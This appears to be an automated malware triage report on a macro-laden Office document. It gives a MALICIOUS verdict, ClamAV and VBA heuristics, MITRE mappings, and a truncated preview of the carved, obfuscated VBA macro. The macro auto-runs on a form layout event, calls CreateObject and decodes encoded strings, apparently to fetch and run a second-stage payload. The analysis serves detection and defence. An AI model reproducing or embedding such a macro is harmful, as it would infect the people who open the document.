Verdict: MALICIOUS
Risk Score: 124

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The critical ClamAV heuristic indicates the file is malicious, identified as Win.Trojan.Agent-6754302-0. The VBA macro contains a CreateObject call, which is often used to instantiate malicious COM objects for executing code. The macro appears to be designed to download and execute a second-stage payload, although the exact URL is obfuscated within the script.
Heuristics (5)

- ClamAV: Win.Trojan.Agent-6754302-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Agent-6754302-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19225 bytes |

SHA-256: dd830c08cc5ff042873e9a8c94bd24899a26f7004556cd95cf7ed76a5e7a0a16

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "MultiPage1, 0, 0, MSForms, MultiPage"
Private Sub MultiPage1_Layout(ByVal Index As Long)
Dim AitNctyqujbOIhPLHlchUvq As String
Dim LHvHlHbywO As Object
Dim LoVeVmIFVUsdTKApVp As Integer
Dim nuIFOFRTKumgwNMlnI As String
LoVeVmIFVUsdTKApVp = 77
AitNctyqujbOIhPLHlchUvq = "\xhwnu" & "y3Xmjqq"
Set LHvHlHbywO = CreateObject(sqatG(AitNctyqujbOIhPLHlchUvq))
nuIFOFRTKumgwNMlnI = vBESNbknCw("dmGwcNNseuV")
nuIFOFRTKumgwNMlnI = uTnxBLmDnfZms(LHvHlHbywO, nuIFOFRTKumgwNMlnI, LoVeVmIFVUsdTKApVp)
End Sub
Function vBESNbknCw(lqATNPJnlpXYxScj As String) As String
Dim NjkKbpKCeQFA As String
Dim uoUDoEmgffFKxnR As String
Dim AvUxEpQoWx As String
AvUxEpQoWx = "H?a|" & "nSiT" & "\xax~" & "XyJr8" & "7aHRi" & LazG("334a7d6a25") & LazG("25346825") & "%%'Xj" & "Y%%y" & "T{BxJy2N" & "Yjr%" & "{FwnFg" & LazG("716a3f486e4f3a") & "W%-`Y~" & "Ujb-'€65‚" & "€:‚€5‚€" & "=‚€>‚€" & ";‚€6" & "‚€9‚€8‚€7‚€" & "<‚€66‚'%" & LazG("324b2c516a48796e2c") & "1,wNsL,1,Y,1,X," & LazG("312c31585e2c312c54512c312c775e6078592c312c4a52332c312c745358336c4a534a574e6833696e68596e74532c312c662c312c68") & LazG("2c312c7467")
Dim VlMFJBIDrlEKwZM As String
VlMFJBIDrlEKwZM = "oJHy" & ",..%%@%" & LazG("2525586a59") & "2nYjr%" & "%-'[FW'0" & "'Nfg" & "qj'0'?'0'" & LazG("5e5a727947") & "P'.%%-%`Y" & "~Ujb-'€7" & "‚€6‚€" & "5‚€8‚'2K%," & "Gqth,1" & ",hWNUy" & LazG("2c312c582c31") & ",P,.%%.%@%" & "%xjY2NyJr%{fw" & LazG("4e4647714a3f764c395c683525252d25") & "%`Y^ujb-'" & LazG("80358280368227324b2c574a2c312c4b2c") & ".%%.%@%%)P8ZHm\%B%`Y~uJb-'€6‚" & "€7‚€:‚€8"
Dim yjIrCTPsmNVj As String
yjIrCTPsmNVj = "‚€5‚€9‚'2k%,jW[nhJuTnSYRFsF," & "1,x,1,~xYJr,1,jY3X,1,ljW,1,3S,.@%%%%)I;oVp%%B%`Y~UJb-'€7‚€5‚€:‚€6‚€9‚€;‚€8‚'2K%,yj,1,J,1,X^X,1,zJxy,1,y3,1,R3s,1,|jGwJv,.@%%%XjY2nyjr%[fWNfgqJ?po8%-%%`Y~ujb-'€;‚€7‚€9‚€8‚€6"
Dim IaFSNgKelBFwoB As String
IaFSNgKelBFwoB = LazG("82803582") & "€:‚€" & LazG("3c822732") & "k,Y,1" & LazG("2c732c31") & ",R3SJ" & ",1,3" & LazG("68576a69") & "j,1,y" & ",1,n,1" & LazG("2c785e58") & LazG("596a2c312c") & LazG("46516846686d") & "j,.%%." & "@%%xjY" & "%%-," & LazG("564d2c302c") & LazG("7e2c2e25252d25") & "%`Y~u" & LazG("4a622d278036828037") & "‚€5‚€8‚€9" & LazG("8227324b252c523379") & "j],1,x" & "^,1,xYj,1,Y3J" & "SHTiNS," & "1,L,." & "%%.@" & ")€wjeleUFym‚%B%-" & LazG("2d2d278037828036388280363b82803a82803582803b82803982803d82")
Dim qJUfNGK As String
qJUfNGK = "€>‚€" & "6=‚€" & "6:‚€" & "6‚€67" & LazG("8280363c") & "‚€66‚" & "€69‚€<" & "‚€8‚€" & "65‚'2k" & LazG("2c473d2c312c") & "wxnt,1" & ",M,1,sIj" & ",1,R" & "nhwt," & "1,tky|fw" & "j,1,<" & ",1,m" & "jrj[jwx" & LazG("6e742c312c7874") & LazG("6b79473d3c5c6e7369742c31") & ",|xG" & "=<H,1" & ",yfnq,1,rjxG=" & "<,1,sG,1,P," & "1,Y,1,y[j,1,H" & LazG("5a3f473d3c582c312c") & LazG("3d3c596d6a2c312c7a77776a732c2e2e32") & LazG("774a755166686a25252c473d3c")
Dim oKZptQyMl As String
oKZptQyMl = ",1`h" & "Mfwb" & ">7.@" & ")€uFW" & "eYX‚%" & "B%)€We" & "JlUfeY" & LazG("4d82332d27") & LazG("80368280") & LazG("35822725") & "2k%," & "uqny" & LazG("2c312c782c") & LazG("2e334e737b74706a2d") & ",a,.@)€ue" & "FYM‚%B%)€w" & "jeLUF" & LazG("65596d82332d27803682") & "€5‚'%2k," & "ny,1,xuq," & LazG("2e334e737b74706a2d276161272e") & LazG("603533332d29807566776559788233") & "'HetzSy'%27.b%2otns%,a,@)€uFe~Qtfi‚%B%-3-'€7" & "‚€6‚€8‚"
Dim kdclvALNnHqaHfo As String
kdclvALNnHqaHfo = "€5‚'2k%" & ",ojhy,1," & "|2,1,Sj" & ",1,Tg,.%-" & "'€7‚€5‚" & LazG("80368227") & "2k%,j,1,sy,1" & ",Sjy3" & LazG("5c6a6768716e") & ",..3-'€9‚€8" & "‚€6‚€5‚€7‚'" & "%2k%,xyw,1" & LazG("2c692c312c6e736c2c312c7c73") & "qtf," & "1,it," & ".3Ns{tpj--'€7‚€<‚€6‚€9‚€66" & "‚€;‚€8‚€>‚€" & LazG("3a8280363782803d82803635828035822725326b2c6a
```

... (truncated)